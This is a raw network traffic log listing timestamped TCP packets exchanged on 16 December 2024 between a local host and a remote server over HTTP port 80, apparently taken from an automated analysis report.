Dec 16, 2024 11:03:30.394618034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.395504951 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.395556927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.395623922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.395935059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.396560907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.396611929 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.396676064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.396727085 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.397676945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.397770882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.397923946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.397972107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.398775101 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.398825884 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.398916960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.398963928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.399804115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.399857044 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.399914980 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.400924921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.400978088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.401042938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.401621103 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.402017117 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.402071953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.402137041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.402493000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.403054953 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.403260946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.403320074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.404179096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.404232025 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.404264927 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.404306889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.405224085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.405278921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.405281067 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.405322075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.406322002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.406385899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.406452894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.406498909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.407377005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.407521963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.407604933 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.408586025 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.408643961 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.408708096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.408762932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.409560919 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.409615040 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.409681082 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.409733057 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.410640001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.410768986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.410830021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.411750078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.411807060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.411873102 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.411926031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.412796021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.412951946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.413007021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.413916111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.413971901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.413990974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.414051056 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.414974928 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.415028095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.415095091 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.415174007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.416121960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.416184902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.416198969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.416249990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.417136908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.417191029 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.417267084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.417320967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.418262005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.418318987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.418380022 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.418430090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.419348001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.419486046 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.419558048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.420391083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.420464993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.420504093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.420555115 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.421473980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.421535015 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.421602011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.421657085 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.422543049 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.422717094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.422770023 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.423645020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.423698902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.423774958 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.423830032 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.424738884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.424860954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.424910069 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.425801992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.425856113 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.425935984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.425987005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.426876068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.426930904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.426997900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.427047968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.428229094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.428282022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.428329945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.428386927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.429090977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.429143906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.429145098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.429198027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.430130005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.430183887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.430237055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.430289030 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.431220055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.431370974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.431422949 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.432349920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.432404041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.432463884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.432516098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.433378935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.433432102 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.433433056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.433485985 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.434456110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.434609890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.434675932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.435585022 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.435637951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.435726881 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.435777903 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.436659098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.436712980 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.436765909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.436822891 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.437727928 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.437781096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.437846899 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.437896967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.438838959 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.438890934 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.438899994 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.438950062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.439939022 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.439992905 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.440017939 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.440071106 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.440988064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.441040993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.441273928 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.441329002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.442181110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.442260027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.442271948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.442321062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.443152905 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.443280935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.443327904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.444251060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.444303036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.444369078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.444417953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.445322990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.445374966 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.445441008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.445497036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.446453094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.446619034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.446674109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.447510004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.447561979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.447626114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.447684050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.448666096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.448719025 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.448775053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.449610949 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.449665070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.585026979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.585095882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.585118055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.585179090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.585433006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.585484982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.585545063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.585596085 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.586519957 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.586574078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.586633921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.586677074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.587610960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.587661028 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.587733984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.587785959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.588691950 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.588745117 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.589293003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.589342117 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.589745045 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.589791059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.589824915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.589869976 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.590801954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.590848923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.590926886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.590972900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.591897964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.591944933 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.592030048 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.592073917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.592993021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.593095064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.593142033 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.594099998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.594140053 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.594199896 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.594239950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.595242977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.595288038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.595372915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.595638037 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.596295118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.596335888 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.596436024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.596479893 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.597356081 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.597439051 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.597444057 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.597572088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.598407030 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.598448038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.598506927 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.598718882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.599484921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.599524975 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.599596024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.599633932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.600600004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.600641966 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.600728989 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.601031065 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.601809978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.601874113 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.601905107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.602663994 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.602912903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.602952003 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.603008986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.603046894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.603841066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.603943110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.604001999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.604964018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.605005026 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.605038881 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.605077028 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.606004953 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.606045008 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.606108904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.606147051 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.607080936 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.607129097 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.607182980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.607220888 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.608166933 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.608220100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.608298063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.608340025 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.609285116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.609339952 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.609361887 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.609850883 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.610348940 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.610388041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.610424995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.610462904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.611439943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.611496925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.611510992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.611548901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.612488031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.612535954 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.612617016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.612657070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.613576889 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.613624096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.613684893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.613723040 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.614692926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.614773035 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.614824057 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.615760088 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.615808964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.615849018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.615889072 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.616827011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.616935015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.616986036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.617899895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.617945910 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.618015051 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.618257999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.618995905 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.619040966 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.619095087 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.619134903 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.620079994 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.620121956 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.620174885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.620317936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.621164083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.621223927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.621290922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.622101068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.622229099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.622272968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.622394085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.622761011 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.623306990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.623349905 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.623514891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.623558998 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.624409914 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.624464035 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.624591112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.624641895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.625524998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.625595093 CET	49833	80	192.168.2.5	31.41.244.11
